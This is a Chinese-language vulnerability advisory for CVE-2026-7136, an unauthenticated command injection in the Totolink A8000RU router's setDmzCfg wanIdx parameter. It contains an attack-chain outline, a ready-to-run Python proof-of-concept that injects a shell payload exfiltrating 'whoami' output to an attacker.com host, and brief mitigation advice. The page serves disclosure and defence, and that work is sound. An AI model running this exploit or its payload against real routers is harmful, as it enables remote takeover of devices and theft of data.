CVE-2026-7136 Totolink A8000RU远程命令执行漏洞

漏洞信息

漏洞编号

CVE-2026-7136

漏洞类型

OS命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A8000RU

漏洞概述

Totolink A8000RU路由器固件版本7.1cu.643_b20200521中存在严重的操作系统命令注入漏洞。该漏洞位于/cgi-bin/cstecgi.cgi文件的setDmzCfg函数处理逻辑中。由于对参数wanIdx缺乏严格的过滤，未经身份验证的攻击者可以通过构造恶意请求在网络远程执行任意系统命令。该漏洞利用难度低且无需用户交互，可能导致设备被完全控制，造成敏感信息泄露、数据篡改或服务中断等严重后果。

技术细节

该漏洞源于Totolink A8000RU路由器CGI接口处理用户输入时的安全缺陷。具体而言，在/cgi-bin/cstecgi.cgi脚本的setDmzCfg功能模块中，程序直接获取HTTP请求中的wanIdx参数，并将其传递给后台系统命令执行环境，未进行任何有效的安全过滤或转义。攻击者可以利用此逻辑漏洞，在wanIdx参数中注入特定的Shell元字符（如分号、管道符或反引号）。由于该接口未设置访问控制（PR:N），攻击者无需登录即可向目标设备发送特制的POST请求。当设备解析并处理该请求时，恶意载荷将被拼接到系统命令中由操作系统Shell执行，从而导致远程代码执行。攻击成功后，攻击者将获得与Web服务器进程相同的权限，进而完全接管路由器系统。

攻击链分析

STEP 1

侦察

攻击者识别出网络上暴露的Totolink A8000RU路由器设备。

STEP 2

武器化

攻击者构造包含恶意Shell命令的HTTP POST数据包，利用setDmzCfg函数中wanIdx参数的注入点。

STEP 3

投递

攻击者将恶意数据包发送至目标设备的/cgi-bin/cstecgi.cgi接口，无需身份验证。

STEP 4

利用

目标设备的CGI程序解析请求，将wanIdx参数值直接拼接到系统命令中并执行。

STEP 5

安装与控制

恶意命令在设备上运行，攻击者获得Root权限，可植入后门、窃取数据或建立僵尸网络节点。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target endpoint
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    
    # Headers
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    
    # Payload exploiting wanIdx parameter in setDmzCfg function
    # Example: Reversing shell or just verifying via ping
    data = {
        "function": "setDmzCfg",
        "wanIdx": "1; ping `whoami`.attacker.com;" # Injected command
    }
    
    try:
        response = requests.post(url, headers=headers, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Payload sent to {target_ip}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

Totolink A8000RU 7.1cu.643_b20200521

防御指南

临时缓解措施

如果无法立即升级固件，建议通过访问控制列表（ACL）严格限制对路由器Web管理界面的访问，仅允许特定的内网IP地址连接。同时，务必关闭路由器的远程Web管理、Telnet及SSH服务，以防止攻击者通过互联网利用此漏洞进行攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7136
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7136
3 Details https://www.cvedetails.com/cve/CVE-2026-7136/
4 VulDB https://vuldb.com/cve/CVE-2026-7136
5 Link https://github.com/Litengzheng/vuldb_new2/blob/main/A8000RU/vul_311/README.md
6 Link https://vuldb.com/submit/801007
7 Link https://vuldb.com/vuln/359735
8 Link https://vuldb.com/vuln/359735/cti
9 Link https://www.totolink.net/